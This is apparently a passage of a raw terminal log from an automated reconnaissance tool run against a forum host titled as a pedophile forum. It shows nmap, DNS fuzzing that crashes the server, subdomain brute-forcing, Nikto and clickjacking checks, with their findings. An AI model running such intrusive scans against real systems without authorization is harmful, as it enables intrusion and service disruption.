945Name: q50.maxns.net
946Address: 188.165.2.137
947Name: q50.maxns.net
948Address: 178.33.115.32
949Name: q50.maxns.net
950Address: 94.23.73.212
951Name: q50.maxns.net
952Address: 94.23.159.185
953Name: q50.maxns.net
954Address: 94.23.76.111
955Name: q50.maxns.net
956Address: 178.33.44.177
957Name: q50.maxns.net
958Address: 178.33.43.178
959
960pedoforums.omgforum.net is an alias for q50.maxns.net.
961q50.maxns.net has address 94.23.150.222
962q50.maxns.net has address 94.23.76.111
963q50.maxns.net has address 188.165.2.137
964q50.maxns.net has address 178.33.44.177
965q50.maxns.net has address 178.33.43.150
966q50.maxns.net has address 94.23.159.185
967q50.maxns.net has address 94.23.73.212
968q50.maxns.net has address 178.33.115.32
969q50.maxns.net has address 178.33.43.178
970[92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m
971
972Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
973
974[+] Target is pedoforums.omgforum.net
975[+] Loading modules.
976[+] Following modules are loaded:
977[x] [1] ping:icmp_ping - ICMP echo discovery module
978[x] [2] ping:tcp_ping - TCP-based ping discovery module
979[x] [3] ping:udp_ping - UDP-based ping discovery module
980[x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
981[x] [5] infogather:portscan - TCP and UDP PortScanner
982[x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
983[x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
984[x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
985[x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
986[x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
987[x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
988[x] [12] fingerprint:smb - SMB fingerprinting module
989[x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
990[+] 13 modules registered
991[+] Initializing scan engine
992[+] Running scan engine
993[-] ping:tcp_ping module: no closed/open TCP ports known on 188.165.2.137. Module test failed
994[-] ping:udp_ping module: no closed/open UDP ports known on 188.165.2.137. Module test failed
995[-] No distance calculation. 188.165.2.137 appears to be dead or no ports known
996[+] Host: 188.165.2.137 is down (Guess probability: 0%)
997[+] Cleaning up scan engine
998[+] Modules deinitialized
999[+] Execution completed.
1000[92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m
1001No match for "PEDOFORUMS.OMGFORUM.NET".
1002>>> Last update of whois database: 2017-11-30T04:31:44Z <<<
1003
1004NOTICE: The expiration date displayed in this record is the date the
1005registrar's sponsorship of the domain name registration in the registry is
1006currently set to expire. This date does not necessarily reflect the expiration
1007date of the domain name registrant's agreement with the sponsoring
1008registrar. Users may consult the sponsoring registrar's Whois database to
1009view the registrar's reported date of expiration for this registration.
1010
1011TERMS OF USE: You are not authorized to access or query our Whois
1012database through the use of electronic processes that are high-volume and
1013automated except as reasonably necessary to register domain names or
1014modify existing registrations; the Data in VeriSign Global Registry
1015Services' ("VeriSign") Whois database is provided by VeriSign for
1016information purposes only, and to assist persons in obtaining information
1017about or related to a domain name registration record. VeriSign does not
1018guarantee its accuracy. By submitting a Whois query, you agree to abide
1019by the following terms of use: You agree that you may use this Data only
1020for lawful purposes and that under no circumstances will you use this Data
1021to: (1) allow, enable, or otherwise support the transmission of mass
1022unsolicited, commercial advertising or solicitations via e-mail, telephone,
1023or facsimile; or (2) enable high volume, automated, electronic processes
1024that apply to VeriSign (or its computer systems). The compilation,
1025repackaging, dissemination or other use of this Data is expressly
1026prohibited without the prior written consent of VeriSign. You agree not to
1027use electronic processes that are automated and high-volume to access or
1028query the Whois database except as reasonably necessary to register
1029domain names or modify existing registrations. VeriSign reserves the right
1030to restrict your access to the Whois database in its sole discretion to ensure
1031operational stability. VeriSign may restrict or terminate your access to the
1032Whois database for failure to abide by these terms of use. VeriSign
1033reserves the right to modify these terms at any time.
1034
1035The Registry database contains ONLY .COM, .NET, .EDU domains and
1036Registrars.
1037[92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m
1038
1039*******************************************************************
1040* *
1041* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
1042* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
1043* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
1044* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
1045* *
1046* TheHarvester Ver. 2.7 *
1047* Coded by Christian Martorella *
1048* Edge-Security Research *
1049* cmartorella@edge-security.com *
1050*******************************************************************
1051
1052
1053[-] Searching in Bing:
1054 Searching 50 results...
1055 Searching 100 results...
1056
1057
1058[+] Emails found:
1059------------------
1060No emails found
1061
1062[+] Hosts found in search engines:
1063------------------------------------
1064No hosts found
1065[92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m
1066
1067; <<>> DiG 9.10.6-Debian <<>> -x pedoforums.omgforum.net
1068;; global options: +cmd
1069;; Got answer:
1070;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 63888
1071;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
1072
1073;; OPT PSEUDOSECTION:
1074; EDNS: version: 0, flags:; udp: 4096
1075;; QUESTION SECTION:
1076;net.omgforum.pedoforums.in-addr.arpa. IN PTR
1077
1078;; AUTHORITY SECTION:
1079in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102443 1800 900 604800 3600
1080
1081;; Query time: 490 msec
1082;; SERVER: 2001:568:ff09:10c::53#53(2001:568:ff09:10c::53)
1083;; WHEN: Wed Nov 29 23:32:28 EST 2017
1084;; MSG SIZE rcvd: 133
1085
1086dnsenum VERSION:1.2.4
1087[1;34m
1088----- pedoforums.omgforum.net -----
1089[0m[1;31m
1090
1091Host's addresses:
1092__________________
1093
1094[0mq50.maxns.net. 21648 IN A 94.23.159.185
1095q50.maxns.net. 21648 IN A 94.23.76.111
1096q50.maxns.net. 21648 IN A 178.33.44.177
1097q50.maxns.net. 21648 IN A 178.33.43.178
1098q50.maxns.net. 21648 IN A 178.33.43.150
1099q50.maxns.net. 21648 IN A 94.23.150.222
1100q50.maxns.net. 21648 IN A 188.165.2.137
1101q50.maxns.net. 21648 IN A 178.33.115.32
1102q50.maxns.net. 21648 IN A 94.23.73.212
1103[1;31m
1104
1105Wildcard detection using: tabedxjuqoxp
1106_______________________________________
1107
1108[0mtabedxjuqoxp.pedoforums.omgforum.net. 86400 IN CNAME q50.maxns.net.
1109q50.maxns.net. 20540 IN A 178.33.43.150
1110q50.maxns.net. 20540 IN A 94.23.159.185
1111q50.maxns.net. 20540 IN A 94.23.73.212
1112q50.maxns.net. 20540 IN A 178.33.115.32
1113q50.maxns.net. 20540 IN A 178.33.43.178
1114q50.maxns.net. 20540 IN A 94.23.150.222
1115q50.maxns.net. 20540 IN A 94.23.76.111
1116q50.maxns.net. 20540 IN A 188.165.2.137
1117q50.maxns.net. 20540 IN A 178.33.44.177
1118[1;31m
1119
1120!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1121
1122 Wildcards detected, all subdomains will point to the same IP address
1123 Omitting results containing 178.33.43.150, 94.23.159.185, 94.23.73.212, 178.33.115.32, 178.33.43.178, 94.23.150.222, 94.23.76.111, 188.165.2.137, 178.33.44.177.
1124 Maybe you are using OpenDNS servers.
1125
1126!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1127[0m[1;31m
1128
1129Name Servers:
1130______________
1131
1132[0m[92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
1133[91m
1134 ____ _ _ _ _ _____
1135 / ___| _ _| |__ | (_)___| |_|___ / _ __
1136 \___ \| | | | '_ \| | / __| __| |_ \| '__|
1137 ___) | |_| | |_) | | \__ \ |_ ___) | |
1138 |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
1139
1140 # Coded By Ahmed Aboul-Ela - @aboul3la
1141
1142[94m[-] Enumerating subdomains now for pedoforums.omgforum.net[0m
1143[93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
1144[92m[-] Searching now in Baidu..[0m
1145[92m[-] Searching now in Yahoo..[0m
1146[92m[-] Searching now in Google..[0m
1147[92m[-] Searching now in Bing..[0m
1148[92m[-] Searching now in Ask..[0m
1149[92m[-] Searching now in Netcraft..[0m
1150[92m[-] Searching now in DNSdumpster..[0m
1151[92m[-] Searching now in Virustotal..[0m
1152[92m[-] Searching now in ThreatCrowd..[0m
1153[92m[-] Searching now in SSL Certificates..[0m
1154[92m[-] Searching now in PassiveDNS..[0m
1155
1156[91m â•”â•â•—╦â•â•—╔╦╗╔â•â•—╦ ╦[0m
1157[91m â•‘ ╠╦╠║ â•šâ•â•—â• â•â•£[0m
1158[91m â•šâ•â•â•©â•šâ• â•©oâ•šâ•â•â•© â•©[0m
1159[91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
1160[94m
1161[91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-pedoforums.omgforum.net-full.txt
1162[0m
1163[92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
1164[92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m
1165
1166[92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
1167PING q50.maxns.net (94.23.159.185) 56(84) bytes of data.
1168
1169--- q50.maxns.net ping statistics ---
11701 packets transmitted, 0 received, 100% packet loss, time 0ms
1171
1172
1173[92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m
1174
1175Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-29 23:33 EST
1176Nmap scan report for pedoforums.omgforum.net (94.23.150.222)
1177Host is up (0.18s latency).
1178Other addresses for pedoforums.omgforum.net (not scanned): 188.165.2.137 178.33.115.32 94.23.73.212 94.23.159.185 94.23.76.111 178.33.44.177 178.33.43.178 178.33.43.150
1179Not shown: 459 closed ports, 8 filtered ports
1180Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1181PORT STATE SERVICE
118253/tcp open domain
118380/tcp open http
118481/tcp open hosts2-ns
1185443/tcp open https
1186444/tcp open snpp
11875666/tcp open nrpe
1188
1189Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
1190
1191[92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
1192[91m + -- --=[Port 21 closed... skipping.[0m
1193[91m + -- --=[Port 22 closed... skipping.[0m
1194[91m + -- --=[Port 23 closed... skipping.[0m
1195[91m + -- --=[Port 25 closed... skipping.[0m
1196[93m + -- --=[Port 53 opened... running tests...[0m
1197
1198Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-29 23:33 EST
1199Nmap scan report for pedoforums.omgforum.net (188.165.2.137)
1200Host is up (0.11s latency).
1201Other addresses for pedoforums.omgforum.net (not scanned): 178.33.115.32 94.23.73.212 94.23.159.185 94.23.76.111 178.33.44.177 178.33.43.178 178.33.43.150 94.23.150.222
1202
1203PORT STATE SERVICE VERSION
120453/udp open domain ISC BIND 9.X
1205| dns-cache-snoop: 100 of 100 tested domains are cached.
1206| google.com
1207| www.google.com
1208| facebook.com
1209| www.facebook.com
1210| youtube.com
1211| www.youtube.com
1212| yahoo.com
1213| www.yahoo.com
1214| baidu.com
1215| www.baidu.com
1216| wikipedia.org
1217| www.wikipedia.org
1218| amazon.com
1219| www.amazon.com
1220| qq.com
1221| www.qq.com
1222| live.com
1223| www.live.com
1224| linkedin.com
1225| www.linkedin.com
1226| twitter.com
1227| www.twitter.com
1228| blogspot.com
1229| www.blogspot.com
1230| taobao.com
1231| www.taobao.com
1232| google.co.in
1233| www.google.co.in
1234| bing.com
1235| www.bing.com
1236| yahoo.co.jp
1237| www.yahoo.co.jp
1238| yandex.ru
1239| www.yandex.ru
1240| wordpress.com
1241| www.wordpress.com
1242| sina.com.cn
1243| www.sina.com.cn
1244| vk.com
1245| www.vk.com
1246| ebay.com
1247| www.ebay.com
1248| google.de
1249| www.google.de
1250| tumblr.com
1251| www.tumblr.com
1252| msn.com
1253| www.msn.com
1254| google.co.uk
1255| www.google.co.uk
1256| googleusercontent.com
1257| www.googleusercontent.com
1258| ask.com
1259| www.ask.com
1260| mail.ru
1261| www.mail.ru
1262| google.com.br
1263| www.google.com.br
1264| 163.com
1265| www.163.com
1266| google.fr
1267| www.google.fr
1268| pinterest.com
1269| www.pinterest.com
1270| google.com.hk
1271| www.google.com.hk
1272| hao123.com
1273| www.hao123.com
1274| microsoft.com
1275| www.microsoft.com
1276| google.co.jp
1277| www.google.co.jp
1278| xvideos.com
1279| www.xvideos.com
1280| google.ru
1281| www.google.ru
1282| weibo.com
1283| www.weibo.com
1284| craigslist.org
1285| www.craigslist.org
1286| paypal.com
1287| www.paypal.com
1288| instagram.com
1289| www.instagram.com
1290| amazon.co.jp
1291| www.amazon.co.jp
1292| google.it
1293| www.google.it
1294| imdb.com
1295| www.imdb.com
1296| blogger.com
1297| www.blogger.com
1298| google.es
1299| www.google.es
1300| apple.com
1301| www.apple.com
1302| conduit.com
1303| www.conduit.com
1304| sohu.com
1305|_www.sohu.com
1306| dns-fuzz: Server stopped responding... He's dead, Jim.
1307|_Offending packet: 0x1a6a00000002000000000000016e7a7a0574766d796f036a39790767626e666475610000010021056c69797a6c04756d7775056a6f68766d077a76757874627ac00c00050001
1308| dns-nsec-enum:
1309|_ No NSEC records found
1310| dns-nsec3-enum:
1311|_ DNSSEC NSEC3 not supported
1312| dns-nsid:
1313|_ bind.version:
1314Too many fingerprints match this host to give specific OS details
1315Network Distance: 8 hops
1316
1317Host script results:
1318| dns-blacklist:
1319| SPAM
1320|_ l2.apews.org - SPAM
1321| dns-brute:
1322| DNS Brute-force hostnames:
1323| mx.omgforum.net - 74.86.112.130
1324| ns1.omgforum.net - 74.86.112.130
1325| ns2.omgforum.net - 178.33.43.150
1326| ns2.omgforum.net - 178.33.43.178
1327| ns2.omgforum.net - 178.33.44.177
1328| ns2.omgforum.net - 188.165.2.137
1329| ns2.omgforum.net - 94.23.150.222
1330| ns2.omgforum.net - 94.23.159.185
1331| ns2.omgforum.net - 94.23.76.111
1332| www.omgforum.net - 87.98.188.44
1333| www.omgforum.net - 87.98.250.104
1334| www.omgforum.net - 87.98.254.183
1335| www.omgforum.net - 94.23.154.108
1336| www.omgforum.net - 94.23.154.120
1337|_ *A: 178.33.115.32
1338
1339TRACEROUTE (using port 53/udp)
1340HOP RTT ADDRESS
13411 109.55 ms 10.13.0.1
13422 109.73 ms 37.187.24.252
13433 109.59 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
13444 111.03 ms vl1247.rbx-g1-a75.fr.eu (37.187.231.234)
13455 111.23 ms 10.95.66.17
13466 111.03 ms 10.50.0.7
13477 111.26 ms 10.50.40.143
13488 110.84 ms 188.165.2.137
1349
1350OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1351Nmap done: 1 IP address (1 host up) scanned in 131.57 seconds
1352[91m + -- --=[Port 79 closed... skipping.[0m
1353[93m + -- --=[Port 80 opened... running tests...[0m
1354[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
1355
1356 ^ ^
1357 _ __ _ ____ _ __ _ _ ____
1358 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1359 | V V // o // _/ | V V // 0 // 0 // _/
1360 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1361 <
1362 ...'
1363
1364 WAFW00F - Web Application Firewall Detection Tool
1365
1366 By Sandro Gauci && Wendel G. Henrique
1367
1368Checking http://pedoforums.omgforum.net
1369Generic Detection results:
1370The site http://pedoforums.omgforum.net seems to be behind a WAF or some sort of security solution
1371Reason: The server returned a different response code when a string trigged the blacklist.
1372Normal response code is "404", while the response code to an attack is "301"
1373Number of requests: 13
1374
1375[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
1376[1m[34mhttp://pedoforums.omgforum.net[0m [200 OK] [1m[37mCookies[0m[[37mexadd[0m], [1m[37mCountry[0m[[37mFRANCE[0m][[1m[31mFR[0m], [1m[37mFrame[0m, [1m[37mIP[0m[[37m178.33.43.178[0m], [1m[37mJQuery[0m, [1m[37mOpen-Graph-Protocol[0m[[1m[32mwebsite[0m], [1m[37mOpenSearch[0m[[37m/improvedsearch.xml,https://www.board-directory.net/search/improvedsearch.xml[0m], [1m[37mScript[0m[[37mapplication/ld+json,text/javascript[0m], [1m[37mTitle[0m[[1m[33mFree forum : welcome to pedo forum's![0m], [1m[37mUncommonHeaders[0m[[37mx-content-type-options,access-control-allow-origin[0m], [1m[37mX-XSS-Protection[0m[[37m1; mode=block[0m]
1377
1378[94m __ ______ _____ [0m
1379[94m \ \/ / ___|_ _|[0m
1380[94m \ /\___ \ | | [0m
1381[94m / \ ___) || | [0m
1382[94m /_/\_|____/ |_| [0m
1383
1384[94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
1385[94m+ -- --=[Target: pedoforums.omgforum.net:80[0m
1386[92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
1387[92m+ -- --=[Site not vulnerable to Host Header Injection![0m
1388[91m+ -- --=[Site vulnerable to Cross-Frame Scripting![0m
1389[91m+ -- --=[Site vulnerable to Clickjacking![0m
1390
1391[93mHTTP/1.1 405 Not Allowed
1392Date: Thu, 30 Nov 2017 04:38:29 GMT
1393Content-Type: text/html
1394Content-Length: 5237
1395ETag: "59c3b881-1475"
1396
1397<!DOCTYPE html>
1398<html>
1399<head>
1400 <title>404 - Page not found</title>
1401 <link rel="shortcut icon" type="image/x-icon" href="https://illiweb.com/fa/favicon/discussion.ico" />
1402 <meta http-equiv="refresh" content="5;URL=/" />
1403 <meta http-equiv="content-type" content="text/html;charset=utf-8" />
1404 <meta name="robots" content="noindex,nofollow" />
1405 <meta name="viewport" content="width=device-width, minimum-scale=0.1" />
1406 <style>
1407 body {
1408 margin:0px;
1409 font-family:Helvetica,sans-serif;
1410 }
1411 header {
1412 background: #369fcf; /* safari only */
1413 background: #369fcf url("https://redcdn.net/frmste/images/slide-forum-creation.png") no-repeat scroll center bottom / 32vh auto;
1414 box-sizing: border-box;
1415 color: white;
1416 max-height: 70vh;
1417 padding: 20px; /* safari only */
1418 [0m
1419[93mHTTP/1.1 200 OK
1420Date: Thu, 30 Nov 2017 04:38:45 GMT
1421Content-Type: text/html; charset=iso-8859-1
1422Transfer-Encoding: chunked
1423P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
1424Cache-Control: no-cache, no-store
1425Pragma: no-cache
1426Expires: Thu, 30 Nov 2017 00:00:00 GMT
1427Last-Modified: Thu, 30 Nov 2017 04:38:45 GMT
1428Vary: User-Agent
1429Set-Cookie: exadd=151205; expires=Thu, 30-Nov-2017 16:38:45 GMT; Max-Age=43200
1430X-Content-Type-Options: nosniff
1431X-XSS-Protection: 1; mode=block
1432Access-Control-Allow-Origin: *
1433
14341e88
1435<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" id="min-width" lang="en" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" ><head><title>Free forum : welcome to pedo forum's!</title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="content-script-type" content="text/javascript" /><meta http-equiv[0m
1436
1437
1438
1439[92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
1440[94m+ -- --=[Checking if X-Content options are enabled on pedoforums.omgforum.net...[0m [93m
1441X-Content-Type-Options: nosniff
1442
1443[94m+ -- --=[Checking if X-Frame options are enabled on pedoforums.omgforum.net...[0m [93m
1444
1445[94m+ -- --=[Checking if X-XSS-Protection header is enabled on pedoforums.omgforum.net...[0m [93m
1446X-XSS-Protection: 1; mode=block
1447
1448[94m+ -- --=[Checking HTTP methods on pedoforums.omgforum.net...[0m [93m
1449Access-Control-Allow-Origin: *
1450
1451[94m+ -- --=[Checking if TRACE method is enabled on pedoforums.omgforum.net...[0m [93m
1452
1453[94m+ -- --=[Checking for META tags on pedoforums.omgforum.net...[0m [93m
1454<meta property="al:android:app_name" content="Topic'it" />
1455<meta property="al:ios:url" content="topicit://pedoforums.omgforum.net/?location=home" />
1456<meta property="al:ios:app_store_id" content="1272582179" />
1457<meta property="al:ios:app_name" content="Topic'it" />
1458<meta name="twitter:app:id:iphone" content="1272582179" />
1459<meta name="twitter:app:url:iphone" content="topicit://pedoforums.omgforum.net/?location=home" />
1460<meta name="twitter:app:id:ipad" content="1272582179" />
1461<meta name="twitter:app:url:ipad" content="topicit://pedoforums.omgforum.net/?location=home" />
1462<meta name="twitter:app:id:googleplay" content="net.topicit.android" />
1463<meta name="twitter:app:url:googleplay" content="topicit://pedoforums.omgforum.net/?location=home" />
1464
1465[94m+ -- --=[Checking for open proxy on pedoforums.omgforum.net...[0m [93m
1466</header>
1467<main>
1468 <hr />
1469 <div class="buttons">
1470 <a onclick="window.history.back();">Previous page</a>
1471 <a href="/">Index</a>
1472 </div>
1473</main>
1474</body>
1475</html>
1476[94m+ -- --=[Enumerating software on pedoforums.omgforum.net...[0m [93m
1477
1478[94m+ -- --=[Checking if Strict-Transport-Security is enabled on pedoforums.omgforum.net...[0m [93m
1479
1480[94m+ -- --=[Checking for Flash cross-domain policy on pedoforums.omgforum.net...[0m [93m
1481</header>
1482<main>
1483 <hr />
1484 <div class="buttons">
1485 <a onclick="window.history.back();">Previous page</a>
1486 <a href="/">Index</a>
1487 </div>
1488</main>
1489</body>
1490</html>
1491[94m+ -- --=[Checking for Silverlight cross-domain policy on pedoforums.omgforum.net...[0m [93m
1492</header>
1493<main>
1494 <hr />
1495 <div class="buttons">
1496 <a onclick="window.history.back();">Previous page</a>
1497 <a href="/">Index</a>
1498 </div>
1499</main>
1500</body>
1501</html>
1502[94m+ -- --=[Checking for HTML5 cross-origin resource sharing on pedoforums.omgforum.net...[0m [93m
1503Access-Control-Allow-Origin: *
1504
1505[94m+ -- --=[Retrieving robots.txt on pedoforums.omgforum.net...[0m [93m
1506
1507User-agent: AhrefsBot
1508User-agent: SemrushBot
1509User-agent: Sogou web spider
1510User-agent: sogou spider
1511User-agent: MJ12bot
1512User-agent: MJ12bot/v1.4.3
1513Crawl-delay: 2
1514
1515Sitemap: http://pedoforums.omgforum.net/sitemap.xml
1516
1517[94m+ -- --=[Retrieving sitemap.xml on pedoforums.omgforum.net...[0m [93m
1518<?xml version="1.0" encoding="utf-8"?>
1519<sitemapindex xmlns="http://www.google.com/schemas/sitemap/0.9"
1520 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
1521 xsi:schemaLocation="http://www.google.com/schemas/sitemap/0.9
1522 http://www.google.com/schemas/sitemap/0.9/siteindex.xsd">
1523</sitemapindex>
1524[94m+ -- --=[Checking cookie attributes on pedoforums.omgforum.net...[0m [93m
1525Set-Cookie: exadd=151206; expires=Thu, 30-Nov-2017 16:41:01 GMT; Max-Age=43200
1526
1527[94m+ -- --=[Checking for ASP.NET Detailed Errors on pedoforums.omgforum.net...[0m [93m
1528
1529[0m
1530[92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
1531- Nikto v2.1.6
1532---------------------------------------------------------------------------
1533+ Target IP: 94.23.150.222
1534+ Target Hostname: pedoforums.omgforum.net
1535+ Target Port: 80
1536+ Start Time: 2017-11-29 23:41:36 (GMT-5)
1537---------------------------------------------------------------------------
1538+ Server: No banner retrieved
1539+ Cookie exadd created without the httponly flag
1540+ The anti-clickjacking X-Frame-Options header is not present.
1541+ Server leaks inodes via ETags, header found with file /eoPsgKY3.shtm, fields: 0x59c3b881 0x1475
1542+ No CGI Directories found (use '-C all' to force check all possible dirs)
1543+ Entry '/go/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
1544+ Entry '/spa/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
1545+ Entry '/sta/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
1546+ Entry '' in robots.txt returned a non-forbidden or redirect HTTP code (200)
1547+ "robots.txt" contains 15 entries which should be manually viewed.
1548+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
1549+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
1550+ OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
1551+ 7513 requests: 0 error(s) and 11 item(s) reported on remote host
1552+ End Time: 2017-11-30 00:24:05 (GMT-5) (2549 seconds)
1553---------------------------------------------------------------------------
1554+ 1 host(s) tested
1555[92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
1556[91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/pedoforums.omgforum.net-port80.jpg
1557[92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
1558[92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m
1559
1560[1;34m _____ [1;37m .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. [0;31m.1BR'''Yp, .8BR'''Cq.
1561[1;34m (_____)[1;37m 01 01N. C 01 C 01 .01. 01 [1;31m 01 Yb 01 .01.
1562[1;34m (() ())[1;37m 01 C YCb C 01 C 01 ,C9 01 [0;31m 01 dP 01 ,C9
1563[1;34m \ / [1;37m 01 C .CN. C 01 C 0101dC9 01 [1;31m 01'''bg. 0101dC9
1564[1;34m \ / [1;37m 01 C .01.C 01 C 01 YC. 01 , [0;31m 01 .Y 01 YC.
1565[1;34m /=\ [1;37m 01 C Y01 YC. ,C 01 .Cb. 01 ,C [1;31m 01 ,9 01 .Cb.
1566[1;34m [___] [1;37m .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C [0;31m.J0101Cd9 .J01L. .J01./ [1;37m2.1
1567
1568[1;37m__[ ! ] Neither war between hackers, nor peace for the system.
1569[1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
1570[1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
1571[1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
1572[1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
1573[1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.25-1 [02;31m][0m
1574[1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
1575[1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 [02;31m][0m
1576[1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
1577[1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
1578[1;37m------------------------------------------------------------------------------------------------------------------------[0m
1579
1580[1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [30-11-2017 00:26:15][0;37m
1581[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1582It is the end user's responsibility to obey all applicable local, state and federal laws.
1583Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m
1584
1585[1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-pedoforums.omgforum.net.txt ][0m
1586[1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:pedoforums.omgforum.net ]
1587[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
1588[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.im ][0m
1589
1590[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
1591[1;37m-[02;31m[[0;31m:::[02;31m][0m
1592[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m
1593
1594[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
1595[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
1596[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.com.gi ID: 006688160405527839966:yhpefuwybre ][0m
1597
1598[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
1599[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
1600
1601[1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 0 ][0m
1602[1;37m[ INFO ][1;33m Not a satisfactory result was found![0m
1603
1604
